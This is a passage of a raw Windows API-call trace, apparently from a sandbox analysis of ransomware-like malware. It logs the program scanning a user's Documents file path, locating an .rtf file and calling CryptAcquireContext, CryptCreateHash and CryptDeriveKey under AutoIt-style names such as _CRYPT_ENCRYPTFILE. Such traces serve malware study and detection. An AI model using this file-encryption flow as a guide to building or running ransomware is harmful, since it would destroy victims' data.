dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.715] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.716] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0178.716] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.716] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.716] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.716] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.716] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.716] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.716] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.716] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xd7475ce0, ftLastWriteTime.dwHighDateTime=0x1d5dae2, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 0x90af58 [0178.716] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.716] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.716] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.716] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.717] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.717] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.717] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0178.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0178.717] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.717] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.717] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0178.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.718] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0178.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.719] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0178.719] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.719] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.719] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0178.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.720] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.720] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.720] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.720] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.720] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.724] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.724] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.724] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.724] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.725] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.725] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.725] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.725] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.725] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.725] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.725] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.726] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.726] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.726] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.726] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0178.726] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] CharUpperBuffW 